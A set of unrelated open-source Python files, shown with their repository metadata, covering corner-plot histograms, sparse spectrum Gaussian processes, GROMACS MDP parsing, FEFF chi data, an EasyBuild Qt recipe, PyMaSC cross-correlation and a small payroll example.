for i, x in enumerate(psamps[1:]):
for j, y in enumerate(psamps[:-1]):
try:
ax = axes[i, j]
except:
ax = axes
# Setup axes.
if span is not None:
ax.set_xlim(span[j])
ax.set_ylim(span[i])
if j > i:
ax.set_frame_on(False)
ax.set_xticks([])
ax.set_yticks([])
continue
if max_n_ticks == 0:
ax.xaxis.set_major_locator(NullLocator())
ax.yaxis.set_major_locator(NullLocator())
else:
ax.xaxis.set_major_locator(
MaxNLocator(max_n_ticks, prune="lower"))
ax.yaxis.set_major_locator(
MaxNLocator(max_n_ticks, prune="lower"))
# Label axes.
sf = ScalarFormatter(useMathText=use_math_text)
ax.xaxis.set_major_formatter(sf)
ax.yaxis.set_major_formatter(sf)
if i < ndim - 2:
ax.set_xticklabels([])
else:
[l.set_rotation(45) for l in ax.get_xticklabels()]
ax.set_xlabel(labels[j], **label_kwargs)
ax.xaxis.set_label_coords(0.5, -0.3)
if j > 0:
ax.set_yticklabels([])
else:
[l.set_rotation(45) for l in ax.get_yticklabels()]
ax.set_ylabel(labels[i + 1], **label_kwargs)
ax.yaxis.set_label_coords(-0.3, 0.5)
# Plot distribution.
ax.plot(y, x, c=color, **plot_kwargs)
# Add live points.
if show_live:
ax.plot(lsamps[j], lsamps[i + 1], c=live_color, **live_kwargs)
return (fig, axes)
def _hist2d(x,
y,
smooth=0.02,
span=None,
weights=None,
levels=None,
ax=None,
color='gray',
plot_datapoints=False,
plot_density=True,
plot_contours=True,
no_fill_contours=False,
fill_contours=True,
contour_kwargs=None,
contourf_kwargs=None,
data_kwargs=None,
**kwargs):
"""
Internal function called by :meth:`cornerplot` used to generate a
a 2-D histogram/contour of samples.
Parameters
----------
x : interable with shape (nsamps,)
Sample positions in the first dimension.
y : iterable with shape (nsamps,)
Sample positions in the second dimension.
span : iterable with shape (ndim,), optional
A list where each element is either a length-2 tuple containing
lower and upper bounds or a float from `(0., 1.]` giving the
fraction of (weighted) samples to include. If a fraction is provided,
the bounds are chosen to be equal-tailed. An example would be::
span = [(0., 10.), 0.95, (5., 6.)]
Default is `0.999999426697` (5-sigma credible interval).
weights : iterable with shape (nsamps,)
Weights associated with the samples. Default is `None` (no weights).
levels : iterable, optional
The contour levels to draw. Default are `[0.5, 1, 1.5, 2]`-sigma.
ax : `~matplotlib.axes.Axes`, optional
An `~matplotlib.axes.axes` instance on which to add the 2-D histogram.
If not provided, a figure will be generated.
color : str, optional
The `~matplotlib`-style color used to draw lines and color cells
and contours. Default is `'gray'`.
plot_datapoints : bool, optional
Whether to plot the individual data points. Default is `False`.
plot_density : bool, optional
Whether to draw the density colormap. Default is `True`.
plot_contours : bool, optional
Whether to draw the contours. Default is `True`.
no_fill_contours : bool, optional
Whether to add absolutely no filling to the contours. This differs
from `fill_contours=False`, which still adds a white fill at the
densest points. Default is `False`.
fill_contours : bool, optional
Whether to fill the contours. Default is `True`.
contour_kwargs : dict
Any additional keyword arguments to pass to the `contour` method.
contourf_kwargs : dict
Any additional keyword arguments to pass to the `contourf` method.
data_kwargs : dict
Any additional keyword arguments to pass to the `plot` method when
adding the individual data points.
"""
if ax is None:
ax = pl.gca()
# Determine plotting bounds.
data = [x, y]
if span is None:
span = [0.999999426697 for i in range(2)]
span = list(span)
if len(span) != 2:
raise ValueError("Dimension mismatch between samples and span.")
for i, _ in enumerate(span):
try:
xmin, xmax = span[i]
except:
q = [0.5 - 0.5 * span[i], 0.5 + 0.5 * span[i]]
span[i] = _quantile(data[i], q, weights=weights)
# The default "sigma" contour levels.
if levels is None:
levels = 1.0 - np.exp(-0.5 * np.arange(0.5, 2.1, 0.5)**2)
# Color map for the density plot, over-plotted to indicate the
# density of the points near the center.
density_cmap = LinearSegmentedColormap.from_list("density_cmap",
[color, (1, 1, 1, 0)])
# Color map used to hide the points at the high density areas.
white_cmap = LinearSegmentedColormap.from_list("white_cmap", [(1, 1, 1),
(1, 1, 1)],
N=2)
# This "color map" is the list of colors for the contour levels if the
# contours are filled.
rgba_color = colorConverter.to_rgba(color)
contour_cmap = [list(rgba_color) for l in levels] + [rgba_color]
for i, l in enumerate(levels):
contour_cmap[i][-1] *= float(i) / (len(levels) + 1)
# Initialize smoothing.
if (isinstance(smooth, int_type) or isinstance(smooth, float_type)):
smooth = [smooth, smooth]
bins = []
svalues = []
for s in smooth:
if isinstance(s, int_type):
# If `s` is an integer, the weighted histogram has
# `s` bins within the provided bounds.
bins.append(s)
svalues.append(0.)
else:
# If `s` is a float, oversample the data relative to the
# smoothing filter by a factor of 2, then use a Gaussian
# filter to smooth the results.
bins.append(int(round(2. / s)))
svalues.append(2.)
# We'll make the 2D histogram to directly estimate the density.
try:
H, X, Y = np.histogram2d(x.flatten(),
y.flatten(),
bins=bins,
range=list(map(np.sort, span)),
weights=weights)
except ValueError:
raise ValueError("It looks like at least one of your sample columns "
"have no dynamic range.")
# Smooth the results.
if not np.all(svalues == 0.):
H = norm_kde(H, svalues)
# Compute the density levels.
Hflat = H.flatten()
inds = np.argsort(Hflat)[::-1]
Hflat = Hflat[inds]
sm = np.cumsum(Hflat)
sm /= sm[-1]
V = np.empty(len(levels))
for i, v0 in enumerate(levels):
try:
V[i] = Hflat[sm <= v0][-1]
except:
V[i] = Hflat[0]
V.sort()
m = (np.diff(V) == 0)
if np.any(m) and plot_contours:
logging.warning("Too few points to create valid contours.")
if np.all(m):
logging.warning('No points at all in the plotted region')
else:
while np.any(m):
V[np.where(m)[0][0]] *= 1.0 - 1e-4
m = (np.diff(V) == 0)
V.sort()
# Compute the bin centers.
X1, Y1 = 0.5 * (X[1:] + X[:-1]), 0.5 * (Y[1:] + Y[:-1])
# Extend the array for the sake of the contours at the plot edges.
H2 = H.min() + np.zeros((H.shape[0] + 4, H.shape[1] + 4))
H2[2:-2, 2:-2] = H
H2[2:-2, 1] = H[:, 0]
H2[2:-2, -2] = H[:, -1]
H2[1, 2:-2] = H[0]
H2[-2, 2:-2] = H[-1]
H2[1, 1] = H[0, 0]
H2[1, -2] = H[0, -1]
H2[-2, 1] = H[-1, 0]
H2[-2, -2] = H[-1, -1]
X2 = np.concatenate([
X1[0] + np.array([-2, -1]) * np.diff(X1[:2]), X1,
X1[-1] + np.array([1, 2]) * np.diff(X1[-2:])
])
Y2 = np.concatenate([
Y1[0] + np.array([-2, -1]) * np.diff(Y1[:2]), Y1,
Y1[-1] + np.array([1, 2]) * np.diff(Y1[-2:])
])
# Plot the data points.
if plot_datapoints:
if data_kwargs is None:
data_kwargs = dict()
data_kwargs["color"] = data_kwargs.get("color", color)
data_kwargs["ms"] = data_kwargs.get("ms", 2.0)
data_kwargs["mec"] = data_kwargs.get("mec", "none")
data_kwargs["alpha"] = data_kwargs.get("alpha", 0.1)
ax.plot(x, y, "o", zorder=-1, rasterized=True, **data_kwargs)
# Plot the base fill to hide the densest data points.
if (plot_contours or plot_density) and not no_fill_contours:
ax.contourf(X2,
Y2,
H2.T, [V.min(), H.max()],
cmap=white_cmap,
antialiased=False)
if plot_contours and fill_contours:
if contourf_kwargs is None:
contourf_kwargs = dict()
contourf_kwargs["colors"] = contourf_kwargs.get("colors", contour_cmap)
contourf_kwargs["antialiased"] = contourf_kwargs.get(
"antialiased", False)
ax.contourf(X2, Y2, H2.T,
np.concatenate([[0], V, [H.max() * (1 + 1e-4)]]),
**contourf_kwargs)
# Plot the density map. This can't be plotted at the same time as the
# contour fills.
elif plot_density:
ax.pcolor(X, Y, H.max() - H.T, cmap=density_cmap)
# Plot the contour edge colors.
if plot_contours:
if contour_kwargs is None:
contour_kwargs = dict()
contour_kwargs["colors"] = contour_kwargs.get("colors", color)
ax.contour(X2, Y2, H2.T, V, **contour_kwargs)
ax.set_xlim(span[0])
ax.set_ylim(span[1])
|
joshspeagle/dynesty
|
py/dynesty/plotting.py
|
Python
|
mit
| 90,999
|
[
"Gaussian"
] |
465adc4ffa43217836c9cce17a39bfac5191e2b80ec3ac451b9b343d1c9c398e
|
# Copyright 2016 James Hensman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gpflow
import numpy as np
import tensorflow as tf
class SSGP(gpflow.models.GPModel):
"""
The Sparse Spectrum GP, judiciously copied from Miguel Lazaro Gredilla's
MATLAB code, available at http://www.tsc.uc3m.es/~miguel/downloads.php. His
code remains as comments in this file.
"""
def __init__(self, X, Y, kern, num_basis=10):
lik = gpflow.likelihoods.Gaussian()
mf = gpflow.mean_functions.Zero()
gpflow.model.GPModel.__init__(self, X, Y, kern=kern, likelihood=lik, mean_function=mf)
input_dim = self.X.shape[1]
if isinstance(kern, gpflow.kernels.RBF):
self.omega = gpflow.param.Param(np.random.randn(num_basis, input_dim))
elif isinstance(kern, gpflow.kernels.Matern12):
self.omega = gpflow.param.Param(np.random.standard_cauchy((num_basis, input_dim)))
elif isinstance(kern, gpflow.kernels.Matern32):
self.omega = gpflow.param.Param(np.random.standard_t(2, (num_basis, input_dim)))
elif isinstance(kern, gpflow.kernels.Matern52):
self.omega = gpflow.param.Param(np.random.standard_t(3, (num_basis, input_dim)))
else:
raise NotImplementedError
assert self.Y.shape[1] == 1
self.num_latent = 1
# m=(length(optimizeparams)-D-2)/D; % number of basis
# ell = exp(optimizeparams(1:D)); % characteristic lengthscale
# sf2 = exp(2*optimizeparams(D+1)); % signal power
# sn2 = exp(2*optimizeparams(D+2)); % noise power
# w = reshape(optimizeparams(D+3:end), [m, D]); % unscaled model angular frequencies
def build_likelihood(self):
# w = w./repmat(ell',[m,1]); % scaled model angular frequencies
w = self.omega / self.kern.lengthscales
m = tf.shape(self.omega)[0]
m_float = tf.cast(m, tf.float64)
# phi = x_tr*w';
phi = tf.matmul(self.X, tf.transpose(w))
# phi = [cos(phi) sin(phi)]; % design matrix
phi = tf.concat([tf.cos(phi), tf.sin(phi)], axis=1)
# R = chol((sf2/m)*(phi'*phi) + sn2*eye(2*m)); % calculate some often-used constants
A = (self.kern.variance / m_float) * tf.matmul(tf.transpose(phi), phi)\
+ self.likelihood.variance * gpflow.tf_wraps.eye(2*m)
RT = tf.cholesky(A)
R = tf.transpose(RT)
# PhiRiphi/R;
# RtiPhit = PhiRi';
RtiPhit = tf.matrix_triangular_solve(RT, tf.transpose(phi))
# Rtiphity=RtiPhit*y_tr;
Rtiphity = tf.matmul(RtiPhit, self.Y)
# % output NLML
# out1=0.5/sn2*(sum(y_tr.^2)-sf2/m*sum(Rtiphity.^2))+ ...
out = 0.5/self.likelihood.variance*(tf.reduce_sum(tf.square(self.Y)) -
self.kern.variance/m_float*tf.reduce_sum(tf.square(Rtiphity)))
# +sum(log(diag(R)))+(n/2-m)*log(sn2)+n/2*log(2*pi);
n = tf.cast(tf.shape(self.X)[0], tf.float64)
out += tf.reduce_sum(tf.log(tf.diag_part(R)))\
+ (n/2.-m_float) * tf.log(self.likelihood.variance)\
+ n/2*np.log(2*np.pi)
return -out
def build_predict(self, Xnew, full_cov=False):
# w = w./repmat(ell',[m,1]); % scaled model angular frequencies
w = self.omega / self.kern.lengthscales
m = tf.shape(self.omega)[0]
m_float = tf.cast(m, tf.float64)
# phi = x_tr*w';
phi = tf.matmul(self.X, tf.transpose(w))
# phi = [cos(phi) sin(phi)]; % design matrix
phi = tf.concat([tf.cos(phi), tf.sin(phi)], axis=1)
# R = chol((sf2/m)*(phi'*phi) + sn2*eye(2*m)); % calculate some often-used constants
A = (self.kern.variance / m_float) * tf.matmul(tf.transpose(phi), phi)\
+ self.likelihood.variance * gpflow.tf_wraps.eye(2*m)
RT = tf.cholesky(A)
R = tf.transpose(RT)
# RtiPhit = PhiRi';
RtiPhit = tf.matrix_triangular_solve(RT, tf.transpose(phi))
# Rtiphity=RtiPhit*y_tr;
Rtiphity = tf.matmul(RtiPhit, self.Y)
# alfa=sf2/m*(R\Rtiphity); % cosines/sines coefficients
alpha = self.kern.variance / m_float * tf.matrix_triangular_solve(R, Rtiphity, lower=False)
# phistar = x_tst*w';
phistar = tf.matmul(Xnew, tf.transpose(w))
# phistar = [cos(phistar) sin(phistar)]; % test design matrix
phistar = tf.concat([tf.cos(phistar), tf.sin(phistar)], axis=1)
# out1(beg_chunk:end_chunk) = phistar*alfa; % Predictive mean
mean = tf.matmul(phistar, alpha)
# % also output predictive variance
# out2(beg_chunk:end_chunk) = sn2*(1+sf2/m*sum((phistar/R).^2,2));% Predictive variance
RtiPhistart = tf.matrix_triangular_solve(RT, tf.transpose(phistar))
PhiRistar = tf.transpose(RtiPhistart)
# NB: do not add in noise variance to the predictive var: gpflow does that for us.
if full_cov:
var = self.likelihood.variance * self.kern.variance / m_float *\
tf.matmul(PhiRistar, tf.transpose(PhiRistar)) + \
gpflow.tf_wraps.eye(tf.shape(Xnew)[0]) * 1e-6
var = tf.expand_dims(var, 2)
else:
var = self.likelihood.variance * self.kern.variance / m_float * tf.reduce_sum(tf.square(PhiRistar), 1)
var = tf.expand_dims(var, 1)
return mean, var
|
jameshensman/VFF
|
VFF/ssgp.py
|
Python
|
apache-2.0
| 6,416
|
[
"Gaussian"
] |
fa9c241c1dee60a2250ec4676255e540b9303dc77fd9fd02fcb2c55639db50de
|
# GromacsWrapper: formats.py
# Copyright (c) 2009-2011 Oliver Beckstein <orbeckst@gmail.com>
# Released under the GNU Public License 3 (or higher, your choice)
# See the file COPYING for details.
"""
Gromacs parameter MDP file format
=================================
The `.mdp file`_ contains a list of keywords that are used to set up a
simulation with :class:`~gromacs.tools.Grompp`. The class :class:`MDP`
parses this file and provides access to the keys and values as ordered
dictionary.
.. _`.mdp file`: http://www.gromacs.org/Documentation/File_Formats/.mdp_File
.. autoclass:: MDP
:members:
"""
from __future__ import absolute_import, with_statement
import os, errno
import re
import warnings
import six
import numpy
from ..exceptions import ParseError, AutoCorrectionWarning
from .. import utilities
from collections import OrderedDict as odict
import logging
class MDP(odict, utilities.FileUtils):
"""Class that represents a Gromacs mdp run input file.
The MDP instance is an ordered dictionary.
- *Parameter names* are keys in the dictionary.
- *Comments* are sequentially numbered with keys Comment0001,
Comment0002, ...
- *Empty lines* are similarly preserved as Blank0001, ....
When writing, the dictionary is dumped in the recorded order to a
file. Inserting keys at a specific position is not possible.
Currently, comments after a parameter on the same line are
discarded. Leading and trailing spaces are always stripped.
.. SeeAlso:: For editing a mdp file one can also use
:func:`gromacs.cbook.edit_mdp` (which works like a
poor replacement for sed).
"""
default_extension = "mdp"
logger = logging.getLogger('gromacs.formats.MDP')
COMMENT = re.compile("""\s*;\s*(?P<value>.*)""") # eat initial ws
# see regex in cbook.edit_mdp()
PARAMETER = re.compile("""
\s*(?P<parameter>[^=]+?)\s*=\s* # parameter (ws-stripped), before '='
(?P<value>[^;]*) # value (stop before comment=;)
(?P<comment>\s*;.*)? # optional comment
""", re.VERBOSE)
def __init__(self, filename=None, autoconvert=True, **kwargs):
"""Initialize mdp structure.
:Arguments:
*filename*
read from mdp file
*autoconvert* : boolean
``True`` converts numerical values to python numerical types;
``False`` keeps everything as strings [``True``]
*kwargs*
Populate the MDP with key=value pairs. (NO SANITY CHECKS; and also
does not work for keys that are not legal python variable names such
as anything that includes a minus '-' sign or starts with a number).
"""
super(MDP, self).__init__(**kwargs) # can use kwargs to set dict! (but no sanity checks!)
self.autoconvert = autoconvert
if filename is not None:
self._init_filename(filename)
self.read(filename)
def _transform(self, value):
if self.autoconvert:
return utilities.autoconvert(value)
else:
return value.rstrip()
def read(self, filename=None):
"""Read and parse mdp file *filename*."""
self._init_filename(filename)
def BLANK(i):
return "B{0:04d}".format(i)
def COMMENT(i):
return "C{0:04d}".format(i)
data = odict()
iblank = icomment = 0
with open(self.real_filename) as mdp:
for line in mdp:
line = line.strip()
if len(line) == 0:
iblank += 1
data[BLANK(iblank)] = ''
continue
m = self.COMMENT.match(line)
if m:
icomment += 1
data[COMMENT(icomment)] = m.group('value')
continue
# parameter
m = self.PARAMETER.match(line)
if m:
# check for comments after parameter?? -- currently discarded
parameter = m.group('parameter')
value = self._transform(m.group('value'))
data[parameter] = value
else:
errmsg = '{filename!r}: unknown line in mdp file, {line!r}'.format(**vars())
self.logger.error(errmsg)
raise ParseError(errmsg)
super(MDP,self).update(data)
def write(self, filename=None, skipempty=False):
"""Write mdp file to *filename*.
:Keywords:
*filename*
output mdp file; default is the filename the mdp
was read from
*skipempty* : boolean
``True`` removes any parameter lines from output that
contain empty values [``False``]
.. Note:: Overwrites the file that the mdp was read from if no
*filename* supplied.
"""
with open(self.filename(filename, ext='mdp'), 'w') as mdp:
for k,v in self.items():
if k[0] == 'B': # blank line
mdp.write("\n")
elif k[0] == 'C': # comment
mdp.write("; {v!s}\n".format(**vars()))
else: # parameter = value
if skipempty and (v == '' or v is None):
continue
if isinstance(v, six.string_types) or not hasattr(v, '__iter__'):
mdp.write("{k!s} = {v!s}\n".format(**vars()))
else:
mdp.write("{} = {}\n".format(k,' '.join(map(str, v))))
|
Becksteinlab/GromacsWrapper
|
gromacs/fileformats/mdp.py
|
Python
|
gpl-3.0
| 5,815
|
[
"Gromacs"
] |
915c6ed871d25bb58e4fe17c1a05fe8257d7dba8f89d722df50db73cd14e10ed
|
'''
* Created by Zhenia Syryanyy (Yevgen Syryanyy)
* e-mail: yuginboy@gmail.com
* License: this code is under GPL license
* Last modified: 2017-02-27
'''
import numpy as np
import os
from feff.libs.dir_and_file_operations import get_folder_name, runningScriptDir
from feff.libs.feff_processing import xftf
def load_experimental_chi_data(file_path):
# load experimental chi-data file. In non-existent points we use linear interp procedure
data = np.loadtxt(file_path, float)
k = np.r_[0:20.05:0.05]
numOfRows = len(k)
chi = np.zeros((numOfRows, 2))
chi[:, 0] = k
k_old = data[:, 0]
chi_old = data[:, 1]
chi_interp = np.interp(k, k_old, chi_old)
chi[:, 1] = chi_interp
return chi
def load_chi_data(file_path):
# load theoreticaly calculeted chi-data file:
k = np.r_[0:20.05:0.05]
numOfRows = len(k)
chi = np.zeros((numOfRows, 2))
data = np.loadtxt(file_path, float)
chi[:, 0] = k
# select chi values only for k > 0 because FEFF output files contain the different length of k-vector:
if len(data[:, 0]) == numOfRows - 1:
chi[1:, 1] = data[:, 1]
# print('theory data without 0-k point has been loaded')
elif len(data[:, 0]) == numOfRows:
chi[:, 1] = data[:, 1]
# print('theory data has been loaded')
elif len(data[:, 0]) < numOfRows - 1:
chi = load_experimental_chi_data(file_path)
# print('experimental data has been loaded')
else:
print('you have unexpected numbers of rows in your output files')
print('input file name is: ', file_path)
print('number of elements is: ', len(data[:, 0]), ' the first k-element is: ', data[0, 0])
return chi
def load_and_apply_xftf(file_path, user='PK'):
data = load_chi_data(file_path)
fr = xftf(data[:, 0], data[:, 1], user=user)
return fr
if __name__ == '__main__':
print('-> you run ', __file__, ' file in a main mode')
file_path1 = r'/home/yugin/VirtualboxShare/GaMnO/1mono1SR2VasVga2_6/feff__0001/chi_1mono1SR2VasVga2_6_000002_00001.dat'
file_path2 = r'/home/yugin/VirtualboxShare/GaMnO/1mono1SR2VasVga2_6/feff__0001/chi_1mono1SR2VasVga2_6_000131_00130.dat'
exp_data_path2 = os.path.join(get_folder_name(runningScriptDir), 'data', '350.chik')
chi1 = load_chi_data(file_path1)
chi2 = load_chi_data(file_path2)
chi3 = load_chi_data(exp_data_path2)
import matplotlib.pyplot as plt
chi = chi1
plt.plot(chi[:, 0], chi[:, 1],)
chi = chi2
plt.plot(chi[:, 0], chi[:, 1],)
chi = chi3
plt.plot(chi[:, 0], chi[:, 1],)
plt.show()
print('finish')
|
yuginboy/from_GULP_to_FEFF
|
feff/libs/load_chi_data_file.py
|
Python
|
gpl-3.0
| 2,623
|
[
"FEFF"
] |
41c6ef36ffa290bd4830ebe9dc41f4c41378f3789018086ec692b1e2a5825af5
|
##
# Copyright 2013 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for building and installing Qt, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
"""
import os
import easybuild.tools.toolchain as toolchain
from easybuild.easyblocks.generic.configuremake import ConfigureMake
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.run import run_cmd_qa
class EB_Qt(ConfigureMake):
"""
Support for building and installing Qt.
"""
def configure_step(self):
"""Configure Qt using interactive `configure` script."""
self.cfg.update('configopts', '-release')
comp_fam = self.toolchain.comp_family()
if comp_fam in [toolchain.GCC]: #@UndefinedVariable
self.cfg.update('configopts', '-platform linux-g++-64')
elif comp_fam in [toolchain.INTELCOMP]: #@UndefinedVariable
self.cfg.update('configopts', '-platform linux-icc-64')
else:
raise EasyBuildError("Don't know which platform to set based on compiler family.")
cmd = "%s ./configure --prefix=%s %s" % (self.cfg['preconfigopts'], self.installdir, self.cfg['configopts'])
qa = {
"Type 'o' if you want to use the Open Source Edition.": 'o',
"Do you accept the terms of either license?": 'yes',
}
no_qa = [
"for .*pro",
r"%s.*" % os.getenv('CXX').replace('+', '\\+'), # need to escape + in 'g++'
"Reading .*",
"WARNING .*",
"Project MESSAGE:.*",
"rm -f .*",
'Creating qmake...',
]
run_cmd_qa(cmd, qa, no_qa=no_qa, log_all=True, simple=True)
def build_step(self):
"""Set $LD_LIBRARY_PATH before calling make, to ensure that all required libraries are found during linking."""
# cfr. https://elist.ornl.gov/pipermail/visit-developers/2011-September/010063.html
self.cfg.update('prebuildopts', 'LD_LIBRARY_PATH=%s:$LD_LIBRARY_PATH' % os.path.join(self.cfg['start_dir'], 'lib'))
super(EB_Qt, self).build_step()
def sanity_check_step(self):
"""Custom sanity check for Qt."""
custom_paths = {
'files': ["lib/libQtCore.so"],
'dirs': ["bin", "include", "plugins"],
}
super(EB_Qt, self).sanity_check_step(custom_paths=custom_paths)
|
ULHPC/modules
|
easybuild/easybuild-easyblocks/easybuild/easyblocks/q/qt.py
|
Python
|
mit
| 3,382
|
[
"VisIt"
] |
203d76f2a58fc02d21e5e4a976d7716e02c5a3f78fd0d994e76148721bff01f3
|
import logging
from multiprocessing import Queue, Lock
import pysam
from PyMaSC.handler.masc_noindex_worker import SingleProcessCalculator
from PyMaSC.handler.masc_worker import NaiveCCCalcWorker, MSCCCalcWorker, NCCandMSCCCalcWorker
from PyMaSC.core.readlen import estimate_readlen
from PyMaSC.utils.progress import MultiLineProgressManager, ProgressBar, ProgressHook
from PyMaSC.utils.calc import exec_worker_pool, filter_chroms
logger = logging.getLogger(__name__)
class InputUnseekable(Exception):
pass
class NothingToCalc(Exception):
pass
class CCCalcHandler(object):
def __init__(self, path, esttype, max_shift, mapq_criteria, nworker=1, skip_ncc=False, chromfilter=None):
self.path = path
self.esttype = esttype
self.max_shift = max_shift
self.mapq_criteria = mapq_criteria
self.nworker = nworker
self.skip_ncc = skip_ncc
#
try:
self.align_file = pysam.AlignmentFile(path)
except ValueError:
logger.error("File has no sequences defined.")
raise
#
target_references = filter_chroms(self.align_file.references, chromfilter)
if not target_references:
logger.error("There is no targeted chromosomes.")
raise NothingToCalc
self.references = []
self.lengths = []
need_warning = False
for reference, length in zip(self.align_file.references, self.align_file.lengths):
if reference in target_references:
self.references.append(reference)
self.lengths.append(length)
#
if not self.align_file.has_index() and self.nworker > 1:
logger.error("Need indexed alignment file for multi-processng. "
"Calculation will be executed by single process.")
self.nworker = 1
elif self.nworker > 1:
self.align_file.close()
#
self.ref2forward_sum = {}
self.ref2reverse_sum = {}
self.ref2ccbins = {}
#
self.mappable_ref2forward_sum = {}
self.mappable_ref2reverse_sum = {}
self.mappable_ref2ccbins = {}
self.ref2mappable_len = {}
#
self.read_len = None
self.mappability_handler = None
def set_readlen(self, readlen=None):
if readlen:
self.read_len = readlen
elif self.path == '-':
logger.error("Cannot execute read length checking for unseekable input.")
raise InputUnseekable
else:
logger.info("Check read length... : " + self.path)
self.read_len = estimate_readlen(self.path, self.esttype, self.mapq_criteria)
if self.read_len > self.max_shift:
logger.error("Read lengh ({}) seems to be longer than shift size ({}).".format(
self.read_len, self.max_shift
))
raise ValueError
def set_mappability_handler(self, mappability_handler):
self.mappability_handler = mappability_handler
bw_chromsizes = self.mappability_handler.chromsizes
for i, reference in enumerate(self.references):
if reference not in bw_chromsizes:
logger.debug("mappability for '{}' not found".format(reference))
continue
self._compare_refsize(reference, bw_chromsizes[reference])
def _compare_refsize(self, reference, bw_chr_size):
i = self.references.index(reference)
bam_chr_size = self.lengths[i]
if bw_chr_size != bam_chr_size:
logger.warning("'{}' reference length mismatch: SAM/BAM -> {:,}, "
"BigWig -> {:,}".format(reference, bam_chr_size, bw_chr_size))
if bam_chr_size < bw_chr_size:
logger.warning("Use longer length '{:d}' for '{}' anyway".format(
bw_chr_size, reference))
self.lengths[i] = bw_chr_size
def run_calcuration(self):
if self.nworker > 1:
# to avoid interfering mappability progress bar with multiline progress bar
ProgressBar.global_switch = False
ProgressHook.global_switch = True
self._run_multiprocess_calcuration()
else:
self._run_singleprocess_calculation()
def _run_singleprocess_calculation(self):
worker = SingleProcessCalculator(
self.align_file, self.mapq_criteria, self.max_shift, self.references,
self.lengths, self.read_len, self.mappability_handler, self.skip_ncc
)
worker.run()
if not self.skip_ncc:
self.ref2forward_sum = worker.nccc.ref2forward_sum
self.ref2reverse_sum = worker.nccc.ref2reverse_sum
self.ref2ccbins = worker.nccc.ref2ccbins
if worker.mscc:
self.mappable_ref2forward_sum = worker.mscc.ref2forward_sum
self.mappable_ref2reverse_sum = worker.mscc.ref2reverse_sum
self.mappable_ref2ccbins = worker.mscc.ref2ccbins
self._calc_unsolved_mappabilty()
def _run_multiprocess_calcuration(self):
self._order_queue = Queue()
self._report_queue = Queue()
self._logger_lock = Lock()
worker_args = [self._order_queue, self._report_queue, self._logger_lock, self.path,
self.mapq_criteria, self.max_shift, self.references, self.lengths]
if self.mappability_handler:
worker_args += [self.mappability_handler.path, self.read_len,
self.mappability_handler.chrom2mappable_len]
if self.skip_ncc:
worker_class = MSCCCalcWorker
else:
worker_class = NCCandMSCCCalcWorker
else:
worker_class = NaiveCCCalcWorker
workers = [worker_class(*worker_args)
for _ in range(min(self.nworker, len(self.references)))]
self._run_calculation_with_workers(workers)
self._calc_unsolved_mappabilty()
def _run_calculation_with_workers(self, workers):
_chrom2finished = {c: False for c in self.references}
progress = MultiLineProgressManager()
with exec_worker_pool(workers, self.references, self._order_queue):
while True:
chrom, obj = self._report_queue.get()
if chrom is None: # update progress
chrom, body = obj
with self._logger_lock:
progress.update(chrom, body)
else:
mappable_len, cc_stats, masc_stats = obj
self._receive_results(chrom, mappable_len, cc_stats, masc_stats)
_chrom2finished[chrom] = True
if all(_chrom2finished.values()):
break
with self._logger_lock:
progress.erase(chrom)
progress.clean()
def _receive_results(self, chrom, mappable_len, cc_stats, masc_stats):
f_sum, r_sum, ccbins = cc_stats
mf_sum, mr_sum, mccbins = masc_stats
if mappable_len is not None:
self.mappability_handler.chrom2mappable_len[chrom] = mappable_len
self.mappability_handler.chrom2is_called[chrom] = True
if None not in (f_sum, r_sum, ccbins):
self.ref2forward_sum[chrom] = f_sum
self.ref2reverse_sum[chrom] = r_sum
self.ref2ccbins[chrom] = ccbins
if None not in (mappable_len, mf_sum, mr_sum, mccbins):
self.mappable_ref2forward_sum[chrom] = mf_sum
self.mappable_ref2reverse_sum[chrom] = mr_sum
self.mappable_ref2ccbins[chrom] = mccbins
def _calc_unsolved_mappabilty(self):
if self.mappability_handler is not None:
if not self.mappability_handler.is_called:
self.mappability_handler.is_called = all(
self.mappability_handler.chrom2is_called.values()
)
self.mappability_handler.calc_mappability()
self.ref2mappable_len = self.mappability_handler.chrom2mappable_len
|
ronin-gw/PyMaSC
|
PyMaSC/handler/masc.py
|
Python
|
mit
| 8,168
|
[
"pysam"
] |
8b3518eb625de32f9b5b7cf288e76d43038ff72b442d0f10d2aa5aff0abca755
|
#!/usr/bin/env python
#coding=utf-8
'''
Created on 01 Ιουλ 2011
@author: tedlaz
'''
class Beverage():
def __init__(self):
self.desc = 'unknown'
def getDesc(self):
return self.desc
def cost(self):
return 0
class Espresso(Beverage):
def __init__(self):
self.desc = 'Espresso'
def cost(self):
return .99
class Mocha():
def __init__(self,bev):
self.beverage = bev
def getDesc(self):
return self.beverage.getDesc() + ", Mocha"
def cost(self):
return .20 + self.beverage.cost()
class ika():
def __init__(self):
self.per = ''
self.peti = 10
self.perg = 20
self.pika = 30
def getFromDB(self,no=0):
self.per = 'IKA Mikta'
self.perg = 10
self.peti = 20
self.pika = self.perg + self.peti
def calc(self,poso):
ika = poso * self.pika / 100
ikaerg = poso * self.perg / 100
ikaeti = ika - ikaerg
return ika, ikaerg, ikaeti
class eidikotita():
def __init__(self,name,isMisthotos=True):
self.per = name
self.isMisthotos = isMisthotos
self.basikosMisthos = 540.24
self.cod = ''
self.ika = ika()
def calcIKA(self):
return self.ika.calc(self.basikosMisthos)
